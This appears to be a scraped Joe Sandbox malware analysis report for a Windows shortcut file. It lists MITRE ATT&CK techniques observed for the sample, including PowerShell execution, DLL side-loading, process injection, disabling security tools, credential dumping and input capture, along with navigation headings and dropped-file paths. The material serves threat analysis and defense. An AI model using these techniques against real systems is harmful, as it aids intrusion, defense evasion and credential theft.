Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fsg5PWtTm2.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\fc299c68-f149-43fc-8f6a-335c350abcce.tmp

Windows Analysis Report
fsg5PWtTm2.lnk

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre